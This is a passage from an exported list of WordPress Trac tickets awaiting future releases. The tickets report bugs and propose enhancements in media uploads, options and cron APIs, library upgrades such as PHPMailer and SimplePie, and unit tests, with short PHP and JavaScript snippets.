WP should also redirect to canonical URL version when someone will try to load URL like site.com/some-post/comment-page-1." sirzooro Future Releases 49664 Uppercase Greek letters are getting accents on iPhone mobile devices General normal normal Awaiting Review defect (bug) reopened dev-feedback 2020-03-18T09:41:28Z 2020-03-18T11:01:33Z "Hi, On my client's under development e-shop made with WP & WooCommerce, all of the uppercase letters appeared at various purchase steps via ""text-transform: uppercase;"" are getting accents. The shop is in Greek language and uppercase letters shouldn't have accents because this is wrong in Greek grammar. Is there maybe a way to fix this? The issue appears only at iPhone mobile devices and not at the rest. Please check my screenshots below to better understand the issue: [https://imgur.com/JxwrGaF] [https://imgur.com/4FmMiur] [https://imgur.com/rTiyiz4] [https://imgur.com/T5KVrSb] [https://imgur.com/XLisjrg] I would like to inform you that I have found a relevant plugin on wordpress.org which seems to fix the issue with the uppercase accents on Greek letters: [https://wordpress.org/plugins/remove-uppercase-accents/#description] In addition, I have found a conversation on [https://stackoverflow.com/] regarding the issue: [https://stackoverflow.com/questions/28783259/how-do-i-make-text-transformuppercase-work-properly-with-greek] I would prefer to avoid adding an extra plugin for fixing the issue. WooCommerce official support also recommended me to report the issue here as the fix should be implemented in WordPress core itself (as it affects WordPress users as well). The problem here seems to be related with the text-transform: uppercase; CSS code. As you may read above, this is a limitation with CSS code that does not remove the accents when switched to uppercase on Greek Language (I am not sure if it happens to other languages as well). Waiting for your further advice on this. Kind Regards, Dimitris" d.chatzimanolis Future Releases 47726 Uploading new media to existing posts/pages backdates file location Media 2.7 normal normal Future Release enhancement reopened dev-feedback 2019-07-17T18:13:57Z 2022-05-23T18:29:08Z "This is a follow-up to #10752. Hello, I just want to know, who thought this was a great idea? This causes so many media managing problems.. Why can't we just simply get to the July folder to get our images uploaded in July? And about the [41964] : Good fix and at the same time it's bad, it only fixes it for pages! And it's not like pages are that different from posts or custom posts, they can serve the same purpose, so why would it be different? Hoping to get a fix soon!" gaelgwp Future Releases 18043 Uploaded images disappear after loading if using compression w/Apache Upload 3.2.1 normal major Future Release defect (bug) new dev-feedback 2011-07-08T22:49:15Z 2019-05-15T21:02:03Z "I have found an issue between WordPress (Multisite) + Google Chrome (Mac) which I think appeared on my sever when I enabled compression a few months ago, but could never reproduce because it only happens with images managed by a Multisite WordPress install, not static images. With images that are static Apache sends the file and calculates the Content-Length its self so these images work fine but if you access a file uploaded to WordPress it uses the .htaccess redirect so the image requests are sent via ms-files.php for what ever reason. The problem is that WordPress decides to calculate its own Content-Length header in the HTTP Response which means that security conscious browsers like Google Chrome freak out when the data they receive is less than they we're told by Apache and they resultantly disable the image. The Content-Length calculation comes on line 43 of ms-files.php I don't know why its needed because Apache seems to sort it out automatically if you don't send your own header, in fact most of the file seems like an unnessisary load of processing, perhaps it needs reviewing but this is a major issue as it is a growing browser, on a growing platform. Here is a great video of it in action: http://www.screencast.com/t/cUYKSegW0N This issue has been repeatedly reported on the forum: http://wordpress.org/support/topic/disappearing-images http://wordpress.org/support/topic/multisite-images-broken http://wordpress.org/support/topic/image-not-show-in-google-chrome-timthumbphp Please fix this asap!" ctsttom Future Releases 16191 Uploaded files with quote marks in the filename are undisplayable in MS Upload normal normal Future Release defect (bug) reopened dev-feedback 2011-01-11T19:28:49Z 2019-11-03T18:40:43Z "If you upload a file with quote marks in the filename, e.g. `""Test"".jpg`, WordPress records the filename as `%22test%22.jpg` but the file is called `""Test"".jpg` (on 'nix-like systems anyway) so is undisplayable. I'm unsure about the implications (security and otherwise) of my suggested patch (attached), so please give feedback. (I guess the other approach would be to retain the url-encoded characters and ensure that the file is named with the URL encoded version of the filename.)" simonwheatley Future Releases 32318 Upload fails, wp_insert_attachment returned 0 Upload 4.1.5 normal normal Awaiting Review defect (bug) new close 2015-05-08T22:34:11Z 2022-10-19T15:47:53Z "One specific mp3 file was failing to attach, and it seems wp_insert_attachment is breaking with 0 returned, breaking update-attachment-metadata: wp-admin/includes/media.php, line 360: {{{ // Save the data $id = wp_insert_attachment($attachment, $file, $post_id); if ( !is_wp_error($id) ) { wp_update_attachment_metadata( $id, wp_generate_attachment_metadata( $id, $file ) ); } }}} id = 0, caused by these lines in wp-includes/post.php, around line 3351: {{{ if ( false === $wpdb->insert( $wpdb->posts, $data ) ) { if ( $wp_error ) { return new WP_Error('db_insert_error', __('Could not insert post into the database'), $wpdb->last_error); } else { return 0; } } }}} In this case the documentation is wrong, it didn't return the post id." programmin Future Releases 54739 Upgrade PHPMailer to 5.2.27 for WordPress < 5.3 (and to 6.5.3 for above 5.4) External Libraries normal normal Awaiting Review defect (bug) new dev-feedback 2022-01-04T16:59:56Z 2022-01-19T13:18:43Z "In WordPress 5.3 the PHP Mailer library was updated to the latest version from the 5.2-branch. See #40472 In WordPress 5.5 the PHP Mailer library was updated to the new version 6. See #41750 As background updates are available from 3.7 on we could update the PHP mailer library down to version 3.7 to protect those installations from being abused for spamming. I checked https://wordpress.org/about/stats/ and WordPress installations with version smaller than 5.3. These sum up to 24.15 %. We only can background update from 3.7, so we need to look at WordPress 3.7 to 5.2 which shows us 18,52 % of all installation which are unprotected. This would at least close two from those three known security problems with this version: https://www.cybersecurity-help.cz/vdb/phpmailer_sourceforge_net/phpmailer/5.2.22/ Quoted from https://github.com/PHPMailer/PHPMailer/releases/tag/v5.2.27: > Note that the 5.2 branch is deprecated and will not receive security updates after 31st December 2018. The same goes for WP 5.5 to 5.8 -> WordPress 5.5 (PHP Mailer 6.1.6) -> WordPress 5.6 (PHP Mailer 6.2) -> WordPress 5.7 (PHP Mailer 6.3) -> WordPress 5.7.2 (PHP Mailer 6.4) -> WordPress 5.7.3 (PHP Mailer 6.5.0) WordPress 5.9 will contain PHP Mailer 6.5.3 as the latest version. As version 6.4.1 and 6.5 are security releases this could be relevant too: https://github.com/PHPMailer/PHPMailer/releases?q=security&expanded=true Although this is related to security it seems that the other tickets about updating this library are handled in public so I created this one here too." zodiac1978 Future Releases 55962 Upgrade `sanitize_hex_color()` to CSS Color Level 4 pbearne Formatting normal normal Future Release enhancement assigned dev-feedback 2022-06-11T04:57:08Z 2024-01-17T00:09:09Z "I’ve noticed that the `sanitize_hex_color()` function unsupports the CSS Color Level 4 with the alpha channel and can therefore not be used. As users are given the ability to provide settings by configuration filters in a mini-plugin or in their theme’s `functions.php`, they may wish to configure opacity alongside. The fix is to extend the validation condition of `sanitize_hex_color()` from: `if ( preg_match( '|^#([A-Fa-f0-9]{3}){1,2}$|', $color ) )` to `if ( preg_match( '|^#([A-Fa-f0-9]{3,4}){1,2}$|', $color ) )`" anrghg Future Releases 39273 Updating to 4.7 can break serialized data because $wpdb->determine_charset now forces utf8 when DB_CHARSET is set to utf8mb4 Database 4.7 normal normal Awaiting Review defect (bug) new dev-feedback 2016-12-14T05:05:58Z 2019-03-15T02:23:09Z "I've seen this happen several times now. `DB_CHARSET` is defined as `utf8mb4` and the columns in the database are set to `utf8mb4_unicode_ci`. However, the changes in 38581 are now forcing `utf8` causing the serialized array lengths to change when the data is queried and breaking them because the charsets don't match. I can't say for certain because I'm debugging this issue on a site that isn't mine, but I don't think anyone explicitly set `DB_CHARSET` to `utf8mb4` in `wp-config.php`. It appears that at one point, WordPress set that define and created (or updated) those tables to `utf8mb4_unicode_ci`. Deleting the `DB_CHARSET` define fixes the issue but that doesn't seem like an ideal solution for users who update and end up with a broken site. I'll admit this is a bit over my head, so I'm hoping someone smarter than me might be able to chime in with some more info :) I'm definitely available to keep the conversation going. Thanks! " justinbusa Future Releases 36462 Updating or publishing a (custom) post that hasn't loaded completely closes comments Posts, Post Types 4.4.2 normal normal Future Release defect (bug) new dev-feedback 2016-04-10T14:44:28Z 2017-02-20T22:19:57Z "I am using a custom post type, but I assume this happens to the default post type as well. On the edit post screen (post.php?post=1&action=edit) I have several custom meta boxes. Some of these have content that is quite slow to load. You can reproduce this behavior by adding a sleep(5) statement somewhere in the code that loads the content for a custom meta box. Now in the document's DOM, the sidebar is loaded before the custom meta boxes. This introduces a situation where it is possible to update or publish a post before all the meta boxes have completely loaded. In most cases this isn't a huge problem - I myself check to see if the $_POST fields are there and if they are not then I don't act upon them. Unfortunately this does not happen for the included ""Discussion"" meta box. This box has a checkbox named ""Allow Comments"" which gets switched off when you update the post before this meta box has loaded into the DOM. The culprit is the code in wp-admin/includes/post.php on line 133 in the _wp_translate_postdata() function: {{{#!php if (!isset( $post_data['comment_status'] )) $post_data['comment_status'] = 'closed'; }}} Since the comment_status field is not in the post data, it is automatically assumed it needs to be closed. Of course there are two ""workarounds"" I can think of that would improve my current situation. One is for me to optimize the meta boxes so the page loads quicker, the other is to move the Discussion metabox to the top of the page, so it loads first. Is this expected behavior? I would much rather see the current comment_status be preserved - don't touch it if I didn't intend to modify it. Of course there might be a reason for this implementation that I don't know about. This post data is then finally presented to wp_insert_post in wp-includes/post.php which actually updates the post's comment_status to become closed, which finally answers my boss' question why comments kept getting disabled automatically." SeBsZ Future Releases 13429 Updating Link URL on image within Admin with Gallery Gallery 2.9.2 normal normal Future Release defect (bug) new dev-feedback 2010-05-18T01:43:42Z 2023-08-24T19:53:27Z "Image insertion no longer allows url to off site resource within Gallery. When inserting a gallery you are unable to specify the Link URL. It keep reverting back to the default." vshoward Future Releases 41901 Updating fails for themes with style.css in sub directory. williampatton Themes normal normal Awaiting Review defect (bug) assigned dev-feedback 2017-09-17T04:54:03Z 2019-03-18T12:54:28Z "https://github.com/WordPress/WordPress/blob/4.8-branch/wp-includes/theme.php#L466-L513 I saw this part and decided to put style.css in /themes/my-theme/subdir/ And in fact it worked. But, there was one problem. That's about updating the theme. ( I update this theme from GitHub instead of WP.org. ) In /wp-admin/update-core.php, Updating is success. At this time in site_transient_update_themes, There was a value of `my-theme/subdir` as a slug. In /wp-admin/themes.php, Updating is failed. An error message was displayed `The theme is at the latest version.`. At that time, the response of ajax was as follows. {{{ { ""success"":false, ""data"": { ""update"":""theme"", ""slug"":""my-themesubdir"", .... } }}} That is, the slash has disappeared. When I looked it up, it was `wp_unslash()` when updating here. I think that it is better to unify processing for slashes on either page. " inc2734 Future Releases 53439 Updating failed. The response is not a valid JSON response. Editor 5.7.2 normal major Awaiting Review defect (bug) new dev-feedback 2021-06-17T10:57:16Z 2021-06-24T23:44:00Z "Hi, There seems to be a issue where when one tries to save a page you get the error ""Updating failed. The response is not a valid JSON response."" The only thing that seems to work is to set the permalink setting to plain. I believe the issue has something to do with paths. I am running PHP 7.0.27 I have installed a fresh install of WP in wwwroot on a hosted service Hostek. Updated to 5.7.2. The only plugin I have is gutenberg using 2021 Theme. Set the permalink to Post Name. No problems with this setup. Then I installed a test WP installation into wwwroot/_test/abc. Updated to 5.7.2. This only has gutenberg and 2021. Set the permalink to Post name. - WP throws the error and refuses to save the page - I do get offered to restore the backup so some sort of saving takes place. Following online guidance, I change the permalink to plain and then WP will save the page. It seems that the issue has something to do with json not liking that WP is not installed at the root of the server. Possibly json is testing the slug and erroring out due to path conflict. error site would be abc.com/_test/abc/slug. good site is abc.com/slug Kind Regards Richard " lupussolaris Future Releases 33147 Updated message on install.php, Username can't be change directly after installation Upgrade/Install normal normal defect (bug) new dev-feedback 2015-07-27T20:03:53Z 2020-01-21T15:25:53Z "On install.php page, Text is wrong, Usernames cannot be changed. " Ankit K Gupta Future Releases 21989 update_option() calls sanitize_option() twice when option does not exist Options, Meta APIs normal normal Future Release defect (bug) new dev-feedback 2012-09-25T05:04:34Z 2024-02-22T06:16:56Z " I just spent several hours tracking down an issue when using the Settings API where `sanitize_option()` is called twice which is unnecessary execution especially if sanitization includes calling an external API for username/password authorization ''(this was how another developer set it up for a plugin I was debugging.)'' What happens is that a call to `update_option()` will call `sanitize_option()` and then if the option wasn't previously in the options table `update_option()` will delegate to `add_option()` which calls `santize_option()` a second time. This would normally be easy to workaround by first calling `get_option()` and testing for `false` and calling `add_option()` instead of `update_option()` if `false`, but not when the Settings API chooses how to call it. I've looked at the problem and can envision several different ways to solve it such but don't know which the core developers would choose ''(or if they'd choose yet another option I haven't envisioned)'' so I didn't submit a patch: - Adding a 3rd parameter `$mode` to `sanitize_option()` that identifies the mode ''('add', 'edit', default = 'unknown')'' and thus allow the hook to ignore one of the options ''(this would be more backward compatible but would put the onus on the developer to know to do this)'', - Adding a 5th parameter `$bypass_sanitize` to `add_option()` defaulted to `false` that is only passed as `true` in `update_option()` allowing `update_option()` to disable the call to `sanitize_option()` found in `add_option()` ''(this would be less backward compatible and hacky, but seemless to the developer)'' - Adding a 3rd parameter `$bypass_sanitize` to `update_option()` defaulted to `false` that is only passed as `true` from `/wp-admin/options.php` allowing `update_option()` to bypass the call to `sanitize_option()` if an `add_option()` will happen ''(this would be less backward compatible and hacky, but seemless to the developer)'' - Have `/wp-admin/options.php` test for no pre-existing option and then call `add_option()` or `update_option()`, respectively ''(this would be seemless to the developer but less backward compatible and not hacky, and it wouldn't handle the general case.)'' So is this worth fixing to save other users and developers debugging time, and to reduce the chance of subtle errors in new code? If yes, how best to approach?" MikeSchinkel Future Releases 49545 update_meta_cache issue while getting record from user meta table in multi site Users 5.3.2 normal blocker Awaiting Review defect (bug) new dev-feedback 2020-02-28T13:11:22Z 2023-04-24T13:16:25Z " Hi All, I am facing a strange wp problem. I have a multisite setup and around 10K sites are running over it. Lots of sites are created with superuser i.e. user_id=1 every time when site hit in the browser then following query executed: Filename: wp-includes/meta.php Method: update_meta_cache Line No: #825 My Application Traffic: 50million/day SELECT user_id, meta_key, meta_value FROM wp_usermeta WHERE user_id IN (1) ORDER BY umeta_id ASC; Problem: if suppose 5k sites created with user_id=1 and then whenever traffic come over my application then it will fetch all rows against this user_id =1 from user meta table and as now around 20k ROWS_EXAMINED and ROWS_SENT in every query but I, in reality, it will require only 4-5 rows based on current blog id (site id). There should be a check for blog id (site id) inside this function because other returning row is useless and due to this my query going slow. I have tried the following things: 1. Change usermeta table engine. MyISAM to InnoDB but its not work There is no possibility of row-level locking, relational integrity in MyISAM but with InnoDB this is possible. MyISAM has table-level locking [Not worked] 2. Try table engine MyISAM to Memory but it's also not working because usermeta contain meta_value and whose data type blob but unfortunate Memory engine will not work with blob so can't able to change the engine to Memory [Not worked] 3. Can I comment this function call or add return null [Not try as of now because this is wp core file and whenever I will update wp version it will show conflict and also not a good approach to change wp core file] 4. Can I some other cache inside here? [not tested because again it's wp core file] 5. Can I add current blog ID check inside this function and retrieve only those records whose belong to this site only [but again this check need to put inside wp core file ie. wp-includes/meta.php] 6. is there any hooks or something which I can use over here? " classicalrehan Future Releases 55553 update_blog_option should accept autoload parameter Options, Meta APIs 5.9.3 normal normal Awaiting Review enhancement new dev-feedback 2022-04-10T21:22:46Z 2024-01-31T21:27:10Z The function update_blog_option doesn't accept any autoload parameter, even though it calls the function update_option that accepts an autoload parameter. giuse Future Releases 16156 update-core is oblivious to api.wp.org being unreachable Upgrade/Install normal normal defect (bug) new dev-feedback 2011-01-08T09:51:38Z 2020-09-17T18:31:46Z "A server running 3.0.4 had trouble reaching *.wordpress.org for some unknown reason. (This wasn't during the brief api.wp.org outage, and it worked otherwise.) Problem is, update-core was completely oblivious to this. It's even worse when running 3.1, because the 'Check Again' button will refresh the page and tell you we last checked for updates *just now*. Try Again or Check Again should reflect that the API is unreachable when this can be determined. Claiming that we checked for updates is also really lame, so we should see if the transient tells us how long it's been since the last one. Side note, the plugin install et al. HTTP error messages are rather cryptic, and we should also make those more user friendly." nacin Future Releases 47218 Update TinyMCE to 5.X.X or 6.X.X TinyMCE normal normal Awaiting Review enhancement new dev-feedback 2019-05-10T17:41:21Z 2023-09-08T21:08:30Z "TinyMCE Version 5.0.5 has been released on May 9, 2019, see: https://www.tiny.cloud/docs/release-notes/release-notes50/ https://www.tiny.cloud/docs/changelog/ Don't we want to keep it up to date? It ''could'' break things, though, see : https://www.tiny.cloud/docs/migration-from-4x/ related: #47205" Presskopp Future Releases 55688 Update size function in WP_Filesystem_Direct Filesystem API 2.5 normal normal Awaiting Review defect (bug) new close 2022-05-06T04:48:11Z 2022-05-06T19:21:54Z "Related: #55678 Replying to [comment:8 costdev]: > > [https://github.com/WordPress/wordpress-develop/pull/2677 PR2677] was discussed in the scrub. The PR patches a different function and this should be handled in a different ticket. " mukesh27 Future Releases 55604 Update SimplePie to version 1.7.0 External Libraries 6.0 normal normal Future Release task (blessed) new needs-unit-tests 2022-04-21T20:05:26Z 2024-02-05T20:11:34Z "A new version of SimplePie has just been released. This version contains a few enhancements and some bug fixes. The most notable change, however, is that this release contains a ''forward-compatibility'' layer for the change to PSR-4 namespaced classes which is targetted for SimplePie 2.0.0. With some similarity to Requests - the namespaced versions of the classes are in a different base directory (`src`) from the original versions (`library`). As WP currently only includes the files in the `library` directory, I would like to suggest to continue doing so for now. This still makes the ''forward-compatibility'' layer available as all files in the `library` directory now create a ''class alias'' to their namespaced version. Once 2.0.0 has been released, the files included in WP, should be switched to the files from the `src` directory (which is currently in place mostly to allow for Composer autoloading) and should start using the namespaced names for the SimplePie classes. I'd recommend for this update to be mentioned in a dev-note, so plugins/themes directly using SimplePie can decide for themselves when they want to change to using the namespaced names for SimplePie classes. Refs: * https://github.com/simplepie/simplepie/releases/tag/1.6.0 * https://github.com/simplepie/simplepie/blob/1.6.0/CHANGELOG.md#160---2022-04-21 * https://github.com/simplepie/simplepie/compare/1.5.8...1.6.0 I've done a cursory check of the changes and they look sane to me, but would very much like to invite a second opinion and I'd recommend testing this change (more thoroughly than usually done for upgrades like these). I'd also like to recommend for a few cursory tests to be added to the WP test suite to ensure that both the PSR-0 as well as the PSR-4 class names load correctly when only including the `library` directory in WP. I'd recommend for this update to be applied in WP 6.1 **early**. Previous: #36669, #51521, #54659" jrf Future Releases 51278 Update return types to reflect the real return types. Remove mixed. General normal major Future Release enhancement reviewing dev-feedback 2020-09-09T16:10:51Z 2021-05-31T23:59:17Z "In the DocBlocks, we document return values with `mixed` only. That is no good practice as it does not show the real available and possible return types. A better approach is to declare and document explicitly return values separated by a pipe character like this `@return bool|string` That is much clearer because developers do not need to check the return values by reading the entire docBlock, reading the whole code of a method, or reading the (lengthy) function description under developer.wordpress.org. A simple`mixed` is outdated and makes it hard for every severe developer to start with coding for WordPress as he has to continually check the expected return values when there is a `mixed`. As a bonus, the documentation under developer.wordpress.org will be updated as well by this change automatically. It will help developers getting know the correct return values immediately from the docs without reading all the extra special explanations that we added to our docs whenever we use `mixed`. That is a huge time saver and makes it much faster for every developer to write solid and better code faster. If this is accepted for core, I will offer to work on this on all other methods as well. That will be a long-lasting process due to the number of functions, but it's definitely worth the effort. We should make this change to all methods where we use`mixed` and make it to our daily little take-care moment when we add new methods to WordPress. Sample Patch by using `get_option()` as an example for all methods that use `mixed`: https://github.com/WordPress/wordpress-develop/pull/523 `get_option()` is a special case, though as it automatically unserializes. So it supports all non-scalar types. Most other methods in WordPress uses `mixed` with only two return types like `bool|string` representation, which makes the updates easier. " ReneHermi Future Releases 29999 update post overwrites slug if current_user is contributor Posts, Post Types 4.0 normal minor Awaiting Review defect (bug) new dev-feedback 2014-10-16T08:09:04Z 2024-03-07T21:30:46Z "The [http://codex.wordpress.org/Function_Reference/wp_update_post/ wp_update_post] function calls [http://codex.wordpress.org/Function_Reference/wp_insert_post/ wp_insert_post] which is located in [https://core.trac.wordpress.org/browser/tags/4.0/src/wp-includes/post.php#L3068/ wp-includes/post.php] in posts.php at lines 3168 - 3171 there is this code: {{{ // Don't allow contributors to set the post slug for pending review posts. if ( 'pending' == $post_status && !current_user_can( 'publish_posts' ) ) { $post_name = ''; } }}} this will remove post_name if the current user is a contributor without any message or notification. This creates an issue because scripts/plugins that uses wp_upadate_post usually don't handle this case (the documentation doesn't cover this also - I would update the documentation but I'm wondering if there's no other solution). I don't see the issues that a contributor changing the slug would create (a contributor vs an editor) anybody does?" jnhghy Future Releases 54034 Update jQuery UI Touch Punch to the latest version Hareesh Pillai External Libraries normal normal Future Release enhancement assigned changes-requested 2021-08-28T19:39:10Z 2023-03-23T17:20:07Z A new version of jQuery UI Touch Punch is available ([https://github.com/furf/jquery-ui-touch-punch/blob/master/jquery.ui.touch-punch.min.js v 0.2.3]). However, this version was released 7 years ago and might have issues while updating. Hareesh Pillai Future Releases 47563 Update get_template_part() function Themes normal normal feature request reopened dev-feedback 2019-06-19T12:31:29Z 2021-03-21T18:49:44Z "I think it would be good to add the ability to programmatically override the output of posts in the loop without interfering with the theme files ( for example, archive.php and others ). This will allow you to change the display of posts through plugins. **For example.** To adapt the theme to work with Woocommerce, you need to edit the theme code. For users, this is sometimes very difficult. My code: {{{#!php <?php function get_template_part( $slug, $name = null ) { /** * Fires before the specified template part file is loaded. * * The dynamic portion of the hook name, `$slug`, refers to the slug name * for the generic template part. * * @since 3.0.0 * * @param string $slug The slug name for the generic template. * @param string|null $name The name of the specialized template. */ do_action( ""get_template_part_{$slug}"", $slug, $name ); $templates = array(); $name = (string) $name; if ( '' !== $name ) { $templates[] = ""{$slug}-{$name}.php""; } $templates[] = ""{$slug}.php""; /** * Fires before a template part is loaded. * * @since 5.2.0 * * @param string $slug The slug name for the generic template. * @param string $name The name of the specialized template. * @param string[] $templates Array of template files to search for, in order. */ do_action( 'get_template_part', $slug, $name, $templates ); $templates = add_filter( 'get_template_part', $templates ); locate_template( $templates, true, false ); } }}} " yanalexandrov Future Releases 37773 Update get_avatar() to support native and registered image sizes. Media 2.5 normal normal Awaiting Review enhancement new dev-feedback 2016-08-22T21:41:26Z 2021-03-31T16:55:15Z "The get_avatar() method currently allows developers to retrieve a user's avatar of a particular size by passing in an integer value, such as `get_avatar( 'jeremy@example.com', 80 )`. In some cases, it might be useful to instead retrieve an avatar by passing in an image size registered with WordPress (e.g., thumbnail, medium, large). See attached patch. " jmichaelward Future Releases 46354 Update Count - Value Should Change as Updates are Applied Administration 5.1 low trivial Future Release enhancement new dev-feedback 2019-02-26T22:58:59Z 2020-02-14T10:54:33Z "The Update Count, shown in the Admin Bar, and the Admin Menu (against 'Dashboard' > 'Updates', and optionally against 'Plugins') should change to reflect the outstanding number of Updates available as Updates are Applied, whether they are applied individually on the Plugin Screen, or in bulk through the Updates Screen. This is not a high priority issue at all, but an extremely minor cosmetic change. I suspect that Javascript could be used to change the value as an Update completes successfully in any scenario. " Lucanos Future Releases 10653 Update comment_author when display_name changes SergeyBiryukov Comments 5.1 normal normal Future Release enhancement reviewing dev-feedback 2009-08-19T19:43:29Z 2021-04-05T12:31:54Z One thing that has bothered me recently is the fact that your previous comments doesn't get updated when your display_name is being updated. Which could cause some confusion. I wrote a function (see attached file for further reference) that takes care of this but I would love to see a similiar feature in the WordPress core. mptre Future Releases 55260 Update Codex Page to Include Password Visibility Button and Language Switcher Login and Registration 5.9.1 normal normal Awaiting Review enhancement new needs-docs 2022-02-25T16:43:24Z 2022-02-25T16:43:24Z "The Codex page, [https://codex.wordpress.org/Customizing_the_Login_Form /Customizing the Login Form], needs to be updated to include the [https://ibb.co/1dZ23W1 /login form password visibility button and the language switcher]. To assist, the following can be added to the updated page for the benefit of all WordPress users: **Code to Disable the Password Visibility Button:** {{{ function remove_wp_hide_pw_button() { ?><script> if ((document.addEventListener != null) && (document.querySelector != null)) { document.addEventListener( 'DOMContentLoaded', function() { var b = document.querySelector('button.wp-hide-pw'); if (b != null) b.remove(); }); } </script> <?php } add_action('login_footer', 'remove_wp_hide_pw_button'); }}} **Filter to Disable the Language Switcher:** {{{ add_filter( 'login_display_language_dropdown', '__return_false' ); }}} **Useful:** (1) Above codes can be implemented using the plugin, [https://wordpress.org/plugins/code-snippets/ /Code Snippets]. (2) Above codes have been thoroughly tested and work as intended. (3) No security issues detected when using the above codes. Thank you!" generosus Future Releases 37255 Update attachment functions to accept a post object in addition to ID johnbillion* Media 4.6 normal normal Future Release enhancement accepted close 2016-07-02T09:26:02Z 2023-04-26T21:37:20Z "Some WordPress functions accept the $post object as parameter instead only the $post_id. Since most of the time we write our code within the loop or we use the $post object, could be an improvement to standardize the functions that require a post id even support the $post object? For the wp_get_attachment_caption for example, could be like this: {{{ /** * Retrieves the caption for an attachment. * * @since 4.6.0 * * @param int|WP_Post|null $post Optional. Post ID or post object. Defaults to global $post. * @return string|false False on failure. Attachment caption on success. */ function wp_get_attachment_caption( $post = null ) { if ( ! $post instanceof WP_Post ) { if ( ! $post = get_post( $post ) ) { return false; } } if ( 'attachment' !== $post->post_type ) { return false; } $caption = $post->post_excerpt; /** * Filters the attachment caption. * * @since 4.6.0 * * @param string $caption Caption for the given attachment. * @param WP_Post $post Attachment object. */ return apply_filters( 'wp_get_attachment_caption', $caption, $post ); } }}} The get_the_post_thumbnail_caption that use the wp_get_attachment_caption accept the $post object. Also, instead of passing the $post->ID to the wp_get_attachment_caption, use the $post object, so we can work directly with the object instead of calling again the get_post function to retrieve it." wido Future Releases 34913 Unscheduling cron jobs fails when original arguments were not an array. Cron API 3.0 normal normal Awaiting Review defect (bug) new dev-feedback 2015-12-08T13:31:40Z 2021-09-02T05:39:24Z "The Cron API does not check whether the cron job arguments passed are an array when scheduling a cron job. This inadvertently allows for scheduling cron jobs with string, integer or other arguments. However when unscheduling the cron job using `wp_clear_scheduled_hook()`, the arguments are ''always'' cast to an array which leads to cron jobs which '''*can*''' be scheduled, but can't be '''''*un*'''''scheduled using `wp_clear_scheduled_hook()`. The `wp_clear_scheduled_hook()` does throw a `deprecated` notices when non-array arguments are passed in, but this will most of the time go unnoticed as this function is most often used in a plugin deactivation routine. The patch which I'm submitting makes sure that cron job arguments are always cast to an array. The patch is backward compatible in that it: * will not break the `schedule_event` filter for plugins (which are ''doing it wrong'') which expect their original non-array argument to test against. * will schedule all newly schedule events with array arguments independently of how the arguments were passed. * will upgrade the cron array to ensure that all arguments are arrays. The patch includes unit tests proving the existence of the bug and the fixing of it by this patch. As far as I can see, this bug was introduced by the changes in https://core.trac.wordpress.org/changeset/12462 and has been in WP since 3.0. The patching of this bug also brought to my attention *another* (ancient) bug where in the cron option upgrade routine `_upgrade_cron_array()` the array structure wasn't respected properly leading to `Undefined index: args` notices and the inadvertent removal of cron events which were scheduled on the same hook for the same timestamp with different arguments. That bug has also been fixed in this patch." jrf Future Releases 35993 Unit tests: XML-RPC Request routines XML-RPC 0.71 normal normal Future Release enhancement new dev-feedback 2016-02-29T01:07:36Z 2022-01-20T13:01:43Z "I wrote unit tests for the 3 methods regards to XML-RPC request in functions.php, the aim is improve de code coverage, theses methods are: * xmlrpc_getposttitle() * xmlrpc_getpostcategory() * xmlrpc_removepostdata() This patch cover 100% of coverage related to theses methods above. Only one thing to consider, I didn't found any XML-RPC format on the WordPress doc with title and category, so I've created a simple XML format with both, following the methods the behaviour is the same." borgesbruno Future Releases 37096 Unit tests for xmlrpc_getposttitle() and xmlrpc_getpostcategory() along with patch to trim and unique returned values SergeyBiryukov XML-RPC 0.71 low minor Future Release enhancement reviewing dev-feedback 2016-06-14T00:24:25Z 2022-01-20T13:01:43Z In tonight's Contrib 2 core we created this unit test for xmlrpc_getposttitle() function pbearne Future Releases 55192 unit tests for _wp_check_existing_file_names hellofromTonya Build/Test Tools normal normal Future Release defect (bug) assigned dev-feedback 2022-02-17T23:25:24Z 2022-11-16T22:04:53Z pbearne Future Releases 43663 Unit Test test_theme_file_uri_returns_valid_uri fails on directories with spaces Build/Test Tools 4.9.5 normal normal Awaiting Review defect (bug) new dev-feedback 2018-03-29T22:15:47Z 2018-03-30T20:56:09Z "Setting up PHPUnit and running the unit tests for the first time produced some failures because I was running from a directory with spaces in the name (WordPress Unit Tests). 4 assertions in total failed, but all 4 of them reference the same function, here is one of the examples: {{{ 1) Test_Theme_File::test_theme_file_uri_returns_valid_uri with data set #0 ('parent-only.php', 'theme-file-parent', array('theme-file-parent')) Failed asserting that two strings are identical. --- Expected +++ Actual @@ @@ -'/Users/mattkeys/Desktop/W/WordPress%20Unit%20Tests/tests/phpunit/includes/../data/themedir1/default/parent-only.php' +'/Users/mattkeys/Desktop/W/WordPress Unit Tests/tests/phpunit/includes/../data/themedir1/default/parent-only.php' }}} Looking at this test, it makes use of esc_url_raw() which encodes the spaces as %20, then compares them against the original URI which has does not have the spaces encoded, so they are not the same. If this is something that we want to fix, an easy way would be to str_replace spaces > %20 before running the assertion. Patch attached." mattkeys Future Releases 42058 Unit test for _autop_newline_preservation_helper() Formatting 4.9 normal normal Awaiting Review defect (bug) new dev-feedback 2017-10-01T18:49:35Z 2017-12-11T17:29:20Z just a unit test pbearne Future Releases 39158 Unify site deactivation process Networks and Sites normal normal Future Release defect (bug) new dev-feedback 2016-12-07T19:20:38Z 2017-08-14T17:16:24Z "Currently there are three cases of ""deleting"" a site on a multisite setup: * deleting a site entirely (for example via Sites list table's ""Delete"" link) * deactivating a site from the network admin (for example via Sites list table's ""Deactivate"" link) * deactivating a site from the site admin (admin can click ""Delete Site"" in Tools menu) Note that deactivating a site does not wipe out the site, but rather sets the ""Deleted"" flag for that site (strange legacy naming, can be ignored here). What this ticket should solve is that the latter two processes work differently although they should be doing the same thing: While deactivating a site from the network admin simply sets the site to ""Deleted"", deactivating the current site from the site admin also removes all users from the site (via `wpmu_delete_blog()`). That means if an admin deactivates their site and later asks support (i.e. the network administrator) to restore it, all users will be gone. I'm not sure why this happens, but I certainly don't think the two actions should have a different behavior. My proposal is to move the part of that function where users are removed into the `if ( $drop )` clause to make sure users are only removed when the site is actually being deleted." flixos90 Future Releases 17451 Unify plugin update notices and include changelog data nacin* Upgrade/Install normal normal enhancement accepted dev-feedback 2011-05-16T09:23:25Z 2019-06-04T21:07:00Z "Currently the after_plugin_row hook is only used on plugins.php which is used by the Changelogger plugin to show plugin changelogs inline. If the hook is also added to the bottom of list_plugin_updates in update_core.php then changelogs could also be displayed on that page too. It's only a single line change so not sure how/if it's worth me attaching a patch for this?" dempsey Future Releases 41791 Unicode + add_permastruct breaks rewrite rules 